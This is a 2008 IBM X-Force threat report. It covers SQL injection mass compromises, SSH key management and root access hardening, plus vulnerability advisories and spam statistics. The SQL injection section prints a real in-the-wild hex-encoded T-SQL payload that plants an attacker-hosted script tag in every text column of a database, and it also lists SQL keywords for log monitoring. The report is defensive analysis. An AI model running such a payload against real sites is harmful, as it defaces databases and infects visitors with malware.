IBM Internet Security Systems X-Force Threat Insight Monthly
IBM Internet Security Systems X-Force Threat Insight Monthly
SQL Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 02
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
X-Force Threat Insight Monthly
Page 1
The X-Force research and development team provides the foundation for a
preemptive approach to Internet security. The X-Force research and
development team is one of the best-known commercial security research
groups in the world. This group of security experts researches and evaluates
vulnerabilities and security issues, develops assessment and countermeasure
technology for IBM ISS products, and educates the public about emerging
Internet threats.
SQL Injection
As today’s operating systems have hardened over time, attackers have turned
from attacking core operating system services to easier targets such as third
party applications, Web browsers, and Web services applications. Web
applications that are designed to interact with a database can be vulnerable to a
class of attacks known as Structured Query Language (SQL) injection.1 SQL
injection occurs when a Web application fails to properly sanitize input received
from an external source. For example, a Web form that asks for a username
normally uses the given input as part of a database query. If this Web form were
vulnerable to SQL injection, an attacker could provide valid SQL in the
username field to cause the application to generate a database query that is not
the one intended by the developer. Instead, the full range of SQL functionality
is now potentially available to the attacker resulting in possible unauthorized
database reads, writes, or even the execution of arbitrary commands on the
vulnerable system.
Many Web servers return error messages that give hints of the underlying
database schema. These error messages can help an attacker craft their SQL
injection attack by revealing table and column names. This information is used
to build an SQL statement that accomplishes the attacker’s goals. However, even
without such assistance from the Web server, techniques known as blind SQL
injection can still be used to successfully compromise the Web server. Blind
SQL injection uses statements that return “True” or “False” instead of relying
on an error message. This approach also allows for a more automated, scriptable
methodology rather than having to manually interpret a variety of error messages.
X-Force Threat Insight Monthly
Page 3
Recent attacks
It is well known that there are certain parts of the Internet that should be
avoided by users who do not want to put themselves at risk. For many years,
users were advised to visit only well-known, respectable sites and avoid
untrusted sites. The theory was that untrusted sites might attempt to download
malware via browser vulnerabilities or social engineering. Trusted sites had to
maintain their reputation in order to stay profitable and therefore could be
relied on to avoid malicious activity. However, SQL injection attacks have
recently turned that adage on its head. Even reputable sites such as government
servers in the United Kingdom2 and the United Nations3 can be unsafe when
compromised via SQL injection.
Over the last several months there have been multiple coordinated and
simultaneous mass compromises of tens of thousands of Web sites.4 These have
not been limited to just one platform or one application. Early attacks were
launched compromising Linux® Apache MySQL PHP (LAMP) systems. More
recent attacks have compromised Microsoft® Windows® IIS ASP SQL systems
and attacked phpBB installations. Some of these attacks have involved
IFRAMEs with JavaScript™ while others are outright SQL injection attacks.
Additionally, some SQL injection attacks have also been tied to the exploitation
of the Adobe® Flash® Player issue discovered by the IBM X-Force team earlier
this year.5
It is important to note that the attackers are not exploiting vulnerabilities in the
actual Web server software (IIS, Apache, etc.), so it is not enough for Web server
administrators to stay up to date on vendor patches. Attackers are analyzing Web
application packages (written in .ASP, PHP, etc.) running on the Web server in
order to find SQL injection vulnerabilities they can exploit. In some cases, once a
vulnerable Web application has been identified, attackers use search engines to
automate the process of finding target sites using the vulnerable applications.6
For each target candidate, SQL is injected into the database so that subsequent
visitors are shown custom HTML created by the attacker.
X-Force Threat Insight Monthly
Page 4
Sample payload
Here is an example of a payload used in a recent mass Web server compromise.
The payload was inserted into a parameter passed in the URL:
s=290’;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063
006C00610072006500200040006D0020007600610072006300680061007200
2800380030003000300029003B00730065007400200040006D003D00270027
003B00730065006C00650063007400200040006D003D0040006D002B002700
7500700064006100740065005B0027002B0061002E006E0061006D0065002-
B0027005D007300650074005B0027002B0062002E006E0061006D0065002-
B0027005D003D0072007400720069006D00280063006F006E0076006500
72007400280076006100720063006800610072002C0027002B0062002E0
06E0061006D0065002B002700290029002B00270027003C0073006300720069007
000740020007300720063003D00220068007400740070003A002F002F0079006-
C00310038002E006E00650074002F0030002E006A00730022003E003C002F007300
630072006900700074003E00270027003B0027002000660072006F006D00200064
0062006F002E007300790073006F0062006A006500630074007300200061002C00
640062006F002E0073007900730063006F006C0075006D006E007300200062002C
00640062006F002E00730079007300740079007000650073002000630020007700
6800650072006500200061002E00690064003D0062002E0069006400200061006E
006400200061002E00780074007900700065003D0027005500270061006E006400
200062002E00780074007900700065003D0063002E007800740079007000650020
0061006E006400200063002E006E0061006D0065003D0027007600610072006300
68006100720027003B00730065007400200040006D003D00520045005600450052
0053004500280040006D0029003B00730065007400200040006D003D0073007500
620073007400720069006E006700280040006D002C0050004100540049004E0044
00450058002800270025003B00250027002C0040006D0029002C00380030003000
300029003B00730065007400200040006D003D0052004500560045005200530045
00280040006D0029003B006500780065006300280040006D0029003B00%20AS%20
NVARCHAR(4000));EXEC(@S);--
X-Force Threat Insight Monthly
Page 5
Here is a bit of perl code that will decode the hex-encoded CAST parameter:
sub castsub {
my $cast = shift || return;
my $decoded = “CAST(“;
while ($cast =~ m#([A-F\d]{2})(0{2})?#g) {
The decoded output shows Microsoft SQL Server® database software code that
searches all the tables in the database for VARCHAR (i.e., text) columns and
inserts a piece of HTML that points back to the attacker’s host. When a Web
page is constructed from the contents of the modified table and served to a
visitor, the visitor unwittingly downloads arbitrary content from the attacker.
In the recent mass Web server attacks, the content served by the injected HTML
consists of browser exploits designed to compromise the visitor’s computer and
install a Trojan that can be remotely controlled by the attacker. The visitor’s
system then becomes yet another node in the attacker’s botnet and can be used
to send spam, search for more sites vulnerable to SQL injection, etc. At least one
set of attackers has used this mechanism to gather passwords for a massively
multiplayer online role-playing game (MMORPG) named World of Warcraft™7.
The attackers then compromise the World of Warcraft accounts in order to
launder assets from the game into real world currency8. These SQL injection
attacks have been extremely effective.
X-Force Threat Insight Monthly
Page 7
Mitigation
Unfortunately, attackers have many available options for remaining
undetected. There are multiple ways of disguising and obfuscating their attack
to prevent discovery. In order to prevent SQL injection, Web applications must
be scanned or audited for places where unfiltered user input is allowed through
to the database. This includes Web forms, URL parameters, and cookie values.
Where possible, use parameterized SQL statements so that the underlying
database driver can escape the harmful characters. Also, monitor Web logs for
intrusion attempts such as hex-encoded strings or SQL keywords such as
DECLARE, CAST, CONVERT, UNION, INSERT or UPDATE.
If you suspect you have been a victim of the recent SQL injection attacks, you
can automate the database cleanup. A template for a Microsoft SQL Server site
might look something like this9:
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(‘update [‘+@T+’]
set [‘+@C+’]= REPLACE(‘+@C+’,’’’ + @BAD + ‘’’, ‘’’’)’
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
X-Force Threat Insight Monthly
Page 8
Introduction
Part 1 of Securing the Secure Shell focused on the history of the Secure Shell
(SSH), the problems with ongoing compromise of SSH servers through
compromised credentials, and the problems rife with the use of reusable
passwords for access to SSH services. Part 1 also introduced the use of SSH
authentication keys and the elimination of reusable passwords on public facing
servers. However, SSH authentication keys alone are not a panacea for securing
SSH, and authentication keys have their own set of problems that must be
recognized and addressed. Part 2 of this series examined securing and managing
SSH authentication keys through ssh-agent and other mechanisms. Part 3
expands on the authentication mechanisms and examines how to address complex
configurations between remote systems, provide authenticated superuser access
and apply these techniques to automated applications and processes.
Often, remote server to server access is needed. This may be for backup
purposes, for performing a hotsync between redundant servers, or for migrating
virtual machines from one physical host machine to another host. These kinds
of access may require large bulk transfers of data. Manipulating small files on
multiple remote servers from a single secure vantage may be practical but
performing large bulk transfers, such as backups, is not. This type of transfer
doubles the amount of net traffic and sends it through longer connections with
smaller bandwidth pipes through security perimeters on its way to and from the
client. This can clog remote connections and degrade network service. Some
server to server tasks can be performed using unprivileged accounts while
other complex tasks require direct root-to-root and server-to-server activity.
REMOTE SERVER REMOTE SERVER REMOTE SERVER REMOTE SERVER REMOTE SERVER
1st ORDER
2nd ORDER SSH
1st ORDER AGENT
SSH- 2nd ORDER SSH
1st ORDER SSH- 1st ORDER AGENT
AGENT AGENT
Individual keys may also be added to the agent on UNIX with a “confirm”
option. When flagged as confirm, a pop-up window will appear any time the
key is used for authentication. This does not require a password, but merely an
“ok” or “cancel” to allow or deny the authentication attempt. The pop-up is
managed by a handler which can be specified to the ssh-agent at the time it is
started. Using this mechanism, a script may be specified to manage the key
confirmation in complex configurations or for automation.
X-Force Threat Insight Monthly
Page 13
SSH agent locking and confirmation work differently with Windows clients than
with UNIX clients. On UNIX, one agent can serve any number of clients and is
server agnostic with regards to the keys it serves. Windows clients generally have
built in agents that are aware of the servers to which they are connected and can
specify which keys are available to which servers over forwarded authentication
connections. This can create problems where multiple keys are required for higher
order connections to other servers. To get around these limitations, Windows
clients may have to work through intermediary systems in a layered approach with
SSH agents providing the necessary depth of keys for complex configurations.
Superuser access
Superuser or root access is often a thorny administrative problem. On one hand,
multiple people may need limited or unlimited access to the root account. On
the other hand, this access needs to be protected and audited. It is a very
common practice to forbid unlimited remote root access and to force users
requiring superuser privileges to authenticate as themselves and then elevate
their privileges to that of root. This task generally requires a reusable password
of one form or another and the practice of employing reusable passwords should
be avoided when possible.
Granting access to the superuser account always entails some risk and can be
difficult to log and audit, owing to the power of the superuser to alter the logs. Even
without SSH involved, it is generally advisable to provide for an autonomous logging
server to which all security events are logged. Access to the logging server is then
forbidden to accounts with access to the servers that are being serviced by it. In this
way, even if a superuser account on a server is compromised, the logs leading up
to the compromise are available for audit and cannot be tampered with. This can be
accomplished with even a very lightweight “little black box” at each remote site.
X-Force Threat Insight Monthly
Page 14
One older, common utility for granting root access is the “su” (also referred to
as “Super User,” “Step Up” or “Switch User”). This command requires the user
to authenticate as the target user (it can switch to users other than root as well).
Anyone using this command to become root must, therefore, know the root
password. This could result in significant consequences for an organization.
Reusable passwords are bad enough. Shared reusable passwords are on an
entirely different – and worse – level. Use of the “su” command should also be
avoided whenever and wherever possible.
A superior command for providing superuser access is the “sudo” command (or
“super” on some flavors of UNIX). This command allows an unprivileged user
to run a command or a shell as root. Which account or group is allowed to run
what commands is controlled by a central configuration file “sudoers.” To use
sudo, an authorized user must authenticate with his or her own password. Sudo
remembers which users have authenticated and does not require reentering the
password for every command. While sudo provides all the functionality of su
along with much finer grained access control, sudo still requires the use of a
reusable password, or no password at all for members of special groups such as
“wheel” if so configured. This is much better than “su” but the goal is to
eliminate the vulnerabilities that are inherent in the use of reusable passwords.
Another option is to use SSH to the root account on the local host. This has
several differences from su or sudo with some advantages and some
disadvantages.
• Advantage: Access to the root account can be locked down and restricted to localhost
only using options in the root authorized_keys file.
• Advantage: It can be as fine grained and versatile as sudo.
• Disadvantage: It takes more effort to set up and configure for complex combinations
of commands.
• Disadvantage: Unlike sudo, it does not preserve the current working environment,
such as current working directory.
• Like su, it acts as a new login as the root user. This could be either an advantage or a
disadvantage depending on the application.
• Auditing of superuser activity must take into account the SSH connections and the user
of origin. This is neither an advantage nor a disadvantage but an operational note.
X-Force Threat Insight Monthly
Page 15
The case where server to server communications is required with root to root
access is far more complex. With superuser access on either system, there is risk
to the system outside of the domain of the maintenance tasks at hand. This is an
asymmetrical risk. If the client system can only read from the server system,
then it is incapable of modifying the server system and risk is limited to
inadvertent information disclosure. If the client system can write to the server
system the risk is manifestly greater due to the ability to modify configurations
on the target server.
SSH provides for “forced commands” as an option in the authorized keys file.
When a key is specified with a forced command, only that command executes
for that key. That command may, in turn, execute the requesting command, or
it may deny access entirely. An example of this is the rrsync script (Restricted
RSYNC) available in the rsync package. When using the rrsync forced
command, only rsync is authorized and directories can be specified as read only
or with read/write subdirectories. With this, the command is limited and the
data flow is limited, preventing even rsync from overwriting the control files
which limit its behavior. For a backup process, this could be used to either limit
a backup client to receiving data (pull mode) or to limit a backup client to
writing data only to a designated backup area (push mode). More complex
scenarios are possible using a variety of openly available shell scripts for this
forced command.
X-Force Threat Insight Monthly
Page 17
The exception to this may be in the case of using Internet Protocol Version 6
(IPv6) for remote access. With IPv6, it is possible to block all non-local Internet
Protocol Version 4 (IPv4) access while allowing traffic between servers to take
place over IPv6. While this is possible in a pure IPv4 environment, it requires
complex filtering and firewall rules and is much more difficult to implement.
X-Force Threat Insight Monthly
Page 18
Automation
Many management tasks in the UNIX world are automated and that presents a
vexing problem with SSH. Reusable passwords are bad. Reusable passwords in
scripts and automation are worse and even passwords on private keying
material are useless when the password must be buried in a script. The problem
is compounded when the keying material and the scripts are present on a
remote system to access other remote systems. When there is no interactive
input from a user, there must either be no password or the password must be
available to the automation process, and thus available to an attacker. For this
reason, the private keying material and the automation process must be secured
by other means.
The LBB shown here is an inexpensive fanless box with an internal hard drive
that only draws five watts of power. Even with only 256MB of RAM, it is more
than capable of orchestrating management jobs on a multitude of remote
systems. It has two Ethernet ports, and a serial port for communications. The
two USB ports can support multiple memory devices, smart cards, and a
console. In the foreground is an 8GB USB memory stick (red) and a USB
cryptographic smart card (blue).
An automated process running on the LBB can, at run time, set up appropriate
authentication agents and load them with the necessary keys. It can then
connect to the remote systems using an unprivileged account to kick off the
jobs that would have previously been started by “cron” on those remote systems.
It may connect up to root on the local host, authenticated through the agent
forwarding as described in a previous section, and subsequently initiate server
to server tasks such as backups as restricted by various filtering limitations and
forced commands on the destination server.
X-Force Threat Insight Monthly
Page 20
Automated processes can be hardened even further through the use of key
confirmation by script on the LBB. Each step of an orchestrated process can be
assigned a different key. As each key is used, it is confirmed by the process
running on the LBB. Each key is used in sequence and not used out of sequence
or twice in a row. If an attacker were to attempt to misuse a key through a
forwarded authentication, this would be immediately detected as an out of
sequence access. When the process is not running, access is not possible
because the keys are unavailable. When the process is running, the keys are
available but their sequence is controlled and abuse is detectable.
The technique for orchestrated, sequential, processes can be taken one step
further with the implementation of a “finite state machine” as the confirmation
agent. Using multiple keys, the confirmation agent can regulate the start and
finish of operations and transition through complex operations while adding,
deleting, and enabling keys dynamically.
ROOT ROOT
ROOT
REMOTE SERVER REMOTE SERVER
USER USER
SSH-
AGENT
AUTOMATION AUTOMATION SYSLOG SERVER
SERVER CONTROL SYSTEM (Little Black Box)
(Little Black Box)
FINITE STATE
MACHINE
Using this technique, all automated processes and associated private keying
material can be migrated back into the security of the LBB and removed from
all remote systems. Embedded passwords and exposed keys on remote systems
are thereby eliminated while retaining the automation functionality.
X-Force Threat Insight Monthly
Page 21
In order to perform this task, vzmigrate requires root access on both servers in
order to access all the files and to set up access, ownership, and permissions on
the destination system. It also must have the ability to write to the destination
system in several areas and must be able to remove old data no longer in use. It
operates where the virtual system is initially running and moves data and
system state information to the destination. This all adds up to a worst case
scenario. The application writes massive amounts of data to several locations on
a remote system and requires remote execution of several commands, including
rsync, vzctl, and rm, amongst others.
An LBB may be used for another approach. This time, an interactive user
connects to the LBB using an unprivileged account and runs a vzmigrate
wrapper on that system. The vzmigrate wrapper sets up its own SSH
authentication agent and loads appropriate keys. It can then connect to the first
hosting server using an unprivileged user account and connect through
localhost up to root. From there, it runs the vzmigrate command to the second
remote server, the destination for the virtual server. All authentication is
managed as in the automation case described previously. In this case, the
operation is initiated by an administrator, rather than a cron job.
VZMIGRATE OPERATION
ROOT ROOT
ROOT
REMOTE SERVER REMOTE SERVER
VZUSER VZUSER
SSH-
AGENT VZUSER
AUTOMATION
SERVER VZMIGRATE SYSLOG SERVER
WRAPPER (Little Black Box)
(Little Black Box)
USER
USER
SSH VZMIGRATE
IMPLEMENTATION
CLIENT SYSTEM
Any time root access is granted to multiple remote systems to perform complex
tasks, it causes a sensitive situation. In this case, three systems are actually
involved; the two host systems and the guest system being moved. The two host
systems merely have root access granted. From the standpoint of the guest
system, however, action is taking place outside of its nominal scope. This “deus
ex machina” can still have serious impact on the virtual system without
appearing inside the system or its processes. To the guest system, this is beyond
root access, it is the equivalent of remote physical access. By using an LBB in
this layered approach, the highly sensitive keys which are employed in this case
can be isolated from the requesting user as well as the remote systems.
X-Force Threat Insight Monthly
Page 23
Recommendations
• Secure all private keying material in secure locations.
• Allow SSH agent forwarding with appropriate confirmations.
• Use a Little Black Box (LBB) for specialized tasks.
• Secure logging server
• Automation control server
• Layered key storage
• Agent proxy for complex keying arrangements
• Central management of ssh configuration files such as authorized_keys files
• Limit unconstrained root access to a limited number of “omega keys”.
X-Force Threat Insight Monthly
Page 24
Conclusion
This series started by pointing out the flaws inherent in reusable passwords and
how that represents the single largest vulnerability in SSH. During the course
of these articles, increasingly complex scenarios were presented where reusable
passwords have been eliminated and replaced with cryptographically strong
SSH authentication. These keys are then secured and managed in a way to
prevent their abuse and still allow for complex operations and automation. It is
possible to eliminate reusable passwords in SSH and secure the keys. By doing
so, organizations help secure the secure shell from the pervasive attacks on the
outside networks. At the same time, SSH use is simplified and overall security is
made more transparent and robust.
X-Force Threat Insight Monthly
Page 25
Significant disclosures
In May, the X-Force team analysts researched and assessed 530 security related
threats. A significant percentage of the vulnerabilities featured within the
X-Force team database became the focal point of malicious code writers whose
productions include malware and targeted exploits.
48%
0.4%
2%
6%
3% 26%
7%
8%
* Represent unique
vulnerability count.
Bypass Security – 7%
An attacker can bypass security restrictions such as a firewall or proxy, an IDS system
or a virus scanner.
Data Manipulation – 26%
An attacker is able to manipulate data stored or used by the host associated with the
service or application.
Denial of Service – 8%
An attacker can crash or hang a service or system, or take down a network.
File Manipulation – 0.4%
An attacker can create, delete, read, modify or overwrite files.
Gain Access – 48%
An attacker can obtain local and remote access. This also includes vulnerabilities in
which an attacker can execute code or execute commands, because this usually allows
the attacker to gain access to the system.
Gain Privilege – 3%
An attacker can gain privileges on the local system only.
Obtain Information – 6%
An attacker can obtain information such as file and path names, source code,
passwords or server configuration details.
Other – 2%
An attacker can perform other, less common attacks, such as price changing. Used when
the other consequences do not apply.
X-Force Threat Insight Monthly
Page 27
On May 13, 2008, the X-Force team published a protection alert to address a
serious vulnerability disclosed in the Microsoft Security Bulletin Summary for
May 2008. The Microsoft Jet Database Engine (msjet40.dll) is vulnerable to a
stack-based buffer overflow that could allow remote code execution. An
attacker could exploit this vulnerability by sending a malicious file as an e-mail
attachment or by hosting it on a Web site and persuading the victim to click a
link. This issue was publicly disclosed in late March with reports of targeted
attacks using this vulnerability.11
While .mdb is on the Microsoft default unsafe file type list, a Jet database file
can be opened from a Microsoft Word document. Although no public proof of
concept code has been published, X-Force analysts consider this to be the most
severe vulnerability in the May Microsoft patch release due to the active
exploitation that has been seen in the wild.
Some reports that surfaced earlier in May speculated that the attacks are being
carried out via a worm. However, our analysts have not confirmed that there is a
self-propagation vector. It appears, at this time, to be more along the lines of
botnet related mass defacements. Indications are that certain Trojans and
botnets associated with these attacks are conducting search engine queries for
ASP / .net pages with certain characteristics and then attacking them en masse.
One such botnet, called the Asprox botnet, is spreading SQL injection tools
disguised as an executable file called msscntr32.exe. The tool searches
Google™ for vulnerabilities in Web pages and then injects an IFrame into the
pages redirecting victims to malicious servers. The X-Force team regularly
identifies 20 to 30 new malware-hosting sites linked to the legitimate URLs
hacked by SQL-infection attacks each day.
Multiple products that use data in SQL queries are vulnerable to SQL injection.
Attackers can use SQL injection techniques to exploit Web sites and
applications that implement SQL queries without first removing potentially
harmful characters. In many cases, all it takes is a single improper line of code
in a Web page to open it up to a SQL injection attack that results in a
compromise of the entire database, thus compromising an entire site. Many
modern Web sites have the database at the core, so this is a pervasive problem.
Adobe Flash Player does not properly handle a specific tag that can exist in
multimedia files. Improper handling of certain values causes a pointer
calculation to go awry, which allows the attacker to write to any memory
location and execute code. Attackers are injecting malicious code into third-
party sites that redirects users to sites hosting malicious files. These attacks
may also be tied to the SQL injection attacks noted in this report.
The ISS IPS coverage released in November of 2007 blocks the samples that are
currently circulating in the wild. The specific signature that covers this issue is
Multimedia_File_Overflow and is turned on and blocked by default in the Trust
X-Force policy. We also encourage those affected to ensure that the latest Adobe
Flash Player version, 9.0.124.0 or later, is installed.
Those running Debian18 or Ubuntu19 systems and using keys for SSH
authentication that were generated between September 2006, and May 13, 2008,
are vulnerable. We strongly urge all those that are affected to upgrade their
OpenSSL package and subsequently regenerate any cryptographic material.
X-Force Threat Insight Monthly
Page 30
The X-Force team believes that most spam e-mail is sent by bot networks.
Botnet operators “rent” their bots out to spammers who then launch massive
e-mail barrages in the shortest possible time to maximize their output while
escaping detection or blocking by antispam technologies and services. Since
bots can be controlled from anywhere, the nationality of the actual attackers
behind a spam e-mail may not be the same as the country from which the spam
originated. Additional spam statistics can be obtained from the IBM Internet
Security Systems X-Force 2007 Trend Statistics (PDF) report.21
The spam industry will remain alive and well as long as there are recipients that
continue to provide spammers with the incentive to keep it going. Users should
be advised to ignore spam and avoid opening unsolicited attachments whether
it is an image, PDF, Microsoft Excel® or other type of file. An organization’s
anti-spam strategy should consist of an effective e-mail filter using
sophisticated techniques to analyze e-mail traffic.
X-Force Threat Insight Monthly
Page 31
Malcode Corner
As part of the continued effort of the IBM ISS X-Force Virus Prevention System
(VPS) team in the strengthening of IBM ISS antivirus, anti-spyware and anti-
malware protection, the VPS team investigated and added another 12,158 new
samples to the malcode zoo in May, 2008.
15.7%
17.2% 10.6%
6.7%
6.5%
3.9%
2.5%
34.6% 1.9%
0.4%
0.0%
References
SQL Injection
1
SQL Injection
http://en.wikipedia.org/wiki/SQL_injection
2
Mass Attack JavaScript injection - UN and UK Government websites compromise
http://securitylabs.websense.com/content/Alerts/3070.aspx
3
United Nations, I Hate to Say I Told You So
http://hackademix.net/2008/04/23/united-nations-i-hate-to-say-i-told-
you-so/
4
A protection alert provided by IBM ISS: Automated SQL Injection Attacks
http://iss.net/threats/293.html
5
A protection advisory provided by IBM ISS: Adobe Flash Player Invalid
Pointer Vulnerability
http://iss.net/threats/289.html
X-Force Threat Insight Monthly
Page 35
6
The 10.000 web sites infection mystery solved
http://isc.sans.org/diary.html?storyid= 4294
7
Danmec/Asprox SQL Injection Attack Tool Analysis
http://www.secureworks.com/research/threats/danmecasprox
8
Gold farming
http://en.wikipedia.org/wiki/Gold_farming
9
Urgent: Deciphering binary code executed against the database
http://www.developersdex.com/sql/message.asp?p=2290&r= 6279713
10
What tuning options should I consider before enabling blocking for
SQL_Injection?
http://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_
faqid= 4748
12
A protection alert provided by IBM ISS: Microsoft Jet Database Engine
(msjet40.dll) Remote Code Execution
http://iss.net/threats/292.html
13
Microsoft Security Bulletin MS08-028: Vulnerability in Microsoft Jet
Database Engine Could Allow Remote Code Execution (950749)
http://www.microsoft.com/technet/security/bulletin/ms08-028.mspx
14
CVE-2007-6026
http://cve.mitre.org/cgi-bin/cvename.cgi?name= CVE-2007-6026
15
A protection alert provided by IBM ISS: Automated SQL Injection Attacks
http://iss.net/threats/293.html
X-Force Threat Insight Monthly
Page 36
16
Adobe Flash zero-day exploit in the wild
http://blogs.zdnet.com/security/?p=1189
Pointer Vulnerability
http://iss.net/threats/289.html
18
Debian Security Advisory DSA-1571-1 : openssl – predictable random
number generator
http://www.debian.org/security/2008/dsa-1571
19
Ubuntu Security Notice USN-612-2: openssh vulnerability
http://www.ubuntu.com/usn/usn-612-2
20
11% of people admit to having bought goods sold via spam
http://www.sophos.com/pressoffice/news/articles/2007/12/spam-buyers.html
21
IBM Internet Security Systems X-Force 2007 Trend Statistics (PDF) report.
http://www.iss.net/documents/literature/x-force_2007_trend_statistics_
report.pdf
22
Data breach at New York bank possibly affecting hundreds of thousands of
CT consumers
http://www.stamfordplus.com/stm/information/nws1/publish/News_1/
Data_breach_at_New_York_bank_possibly_affecting_hundreds_of_
thousands_of_CT_consumers2408.shtml
23
Hacker splashes data from six million Chileans on Internet: report
http://afp.google.com/article/
ALeqM5gBr0NRGekgAS90YwVpnBHHCxeLZw
24
Restaurant chain hacked by packet sniffer
http://www.techworld.com/security/news/index.cfm?newsid=101479
25
OSU Parking Services and Transit Incident
http://idalert.okstate.edu/incident_00003.html
X-Force Threat Insight Monthly
Page 37
26
Staten Island University Hospital Patients Personal Records Stolen In
December
http://cyberinsecure.com/staten-island-university-hospital-patients-
personal-records-stolen-in-december/
27
US State Department loses a lot of laptops
http://www.securecomputing.net.au/news/75415,us-state-department-
loses-a-lot-of-laptops.aspx
All performance data contained in this publication was obtained in the specific
operating environment and under the conditions described above and is
presented as an illustration. Performance obtained in other operating
environments may vary and customers should conduct their own testing.
© Copyright IBM Corporation 2008.
06-08